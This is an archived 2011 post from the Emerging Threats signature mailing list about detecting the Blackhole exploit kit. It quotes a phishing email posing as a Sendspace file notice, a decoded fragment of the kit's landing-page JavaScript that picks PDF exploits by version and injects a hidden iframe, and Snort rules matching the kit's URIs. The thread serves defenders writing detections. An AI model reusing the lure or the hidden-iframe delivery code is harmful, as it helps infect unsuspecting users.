[Emerging-Sigs] Proposed Signature for Blackhole Exploit Landing malicious applet

Nick Randolph randolphdavidn at gmail.com
Mon Oct 3 11:49:13 EDT 2011


It's hitting people from inbound spam and people are clicking the links :(
Here is a sample message, the filename, filesize and the sentby NAME are not
static. The Download link sends them off to the main.php site URL associated
with the blackhole exploit toolkit.

Sendspace File Delivery Notification:
You've got a file called Ahauge-26799.pdf, (705.9 KB) waiting to be
downloaded at sendspace.(It was sent by DENAE READ).
You can use the following link to retrieve your file:
Download Link
The file may be available for a limited time only.
Thank you,sendspace - The best free file sharing service
.----------------------------------------------------------------------
Please do not reply to this email. This auto-mailbox is not monitored and
you will not receive a response.

On Mon, Oct 3, 2011 at 10:32 AM, Chris Wakelin <c.d.wakelin at reading.ac.uk>wrote:

> Hmm, looking at one from last week we have (thanks to my yucky decoder +
> jsbeautifier.py):-
>
> > function spl5() {
> >     if (pdfver[0] > 0 && pdfver[0] < 8) {
> >         show_pdf('./content/1fdp.php?f=22')
> >     } else if ((pdfver[0] == 8) || (pdfver[0] == 9 && pdfver[1] <= 3)) {
> >         show_pdf2('./content/2fdp.php?f=22')
> >     }
> >     spl6()
> > }
>
> (I've never seen a 1fdp.php download - perhaps it's too old an exploit
> now!)
>
> > function spl6() {
> >     try {
> >         for (var i = 0, m; i < navigator.plugins.length; i++) {
> >             var name = navigator.plugins[i].name;
> >             if (name.indexOf('Media Player') != -1) {
> >                 m = document.createElement('IFRAME');
> >                 m.setAttribute('src', './content/pch2.php?c=22');
> >                 m.setAttribute('width', 0);
> >                 m.setAttribute('height', 0);
> >                 document.body.appendChild(m)
> >             }
> >         }
> >     } catch (e) {}
> >     setTimeout(spl7, 1000)
> > }
>
> I'm not sure I've ever seen a pch2.php download either (other than by
> me!), but I guess we could add detection for this?
>
> Best Wishes,
> Chris
>
> On 03/10/11 15:13, Nathan wrote:
> > On Mon, 03 Oct 2011 15:07:59 +0100 Chris Wakelin <
> c.d.wakelin at reading.ac.uk>
> > wrote
> >
> >> Looking at the actual exploit kit, they're including the Java and PDF
> >> exploits but not the Flash or HCP exploits (whatever HCP is?) at the
> moment.
> >
> > It's the Help Control Protocol, another pseudo-protocol used by Win32,
> > 'hcp://'.  There were a few vulnerabilities out for it and it looks like
> the
> > exploit kits are leveraging it.  From what I recall I do have one up
> there for
> > HCP in less than Media Player 10.0... I believe I wrote 2013077 so it may
> need
> > some updating if the URI has changed.
> >
> >
> http://blogs.technet.com/b/srd/archive/2010/06/10/help-and-support-center-vulnerability-full-disclosure-posting.aspx
> >
> > emerging-current_events.rules:alert tcp $HOME_NET any -> $EXTERNAL_NET
> > $HTTP_PORTS (msg:"ET CURRENT_EVENTS Blackhole Exploit Pack HCP overflow
> Media
> > Player lt 10"; flow:established,to_server; content:"/hcp_asx.php?f=";
> > http_uri; pcre:"/hcp_asx\.php\?f=\d+$/U"; classtype:trojan-activity;
> > sid:2013077; rev:1;)
> >
> > emerging-current_events.rules:alert tcp $HOME_NET any -> $EXTERNAL_NET
> > $HTTP_PORTS (msg:"ET CURRENT_EVENTS Blackhole Exploit Pack HCP exploit";
> > flow:established,to_server; content:"/pch.php?f="; http_uri;
> > pcre:"/pch\.php\?f=\d+$/U"; classtype:bad-unknown; sid:2013548; rev:1;)
> >
> > emerging-current_events.rules:alert tcp $HOME_NET any -> $EXTERNAL_NET
> > $HTTP_PORTS (msg:"ET CURRENT_EVENTS Blackhole Exploit Pack HCP exploit
> 2";
> > flow:established,to_server; content:"/hcp_vbs.php?f="; http_uri;
> > pcre:"/hcp_vbs\.php\?f=\d+&d=\d+$/U"; classtype:bad-unknown; sid:2013549;
> > rev:1;)
> >
> > Thanks,
> > Nathan
> >
> >
>
>
> --
> --+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+-
> Christopher Wakelin,                           c.d.wakelin at reading.ac.uk
> IT Services Centre, The University of Reading,  Tel: +44 (0)118 378 2908
> Whiteknights, Reading, RG6 6AF, UK              Fax: +44 (0)118 975 3094
>  _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>
> Support Emerging Threats! Subscribe to Emerging Threats Pro
> http://www.emergingthreatspro.com
> The ONLY place to get complete premium rulesets for Snort 2.4.0 through
> Current!
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20111003/4f3b846c/attachment.html


More information about the Emerging-sigs mailing list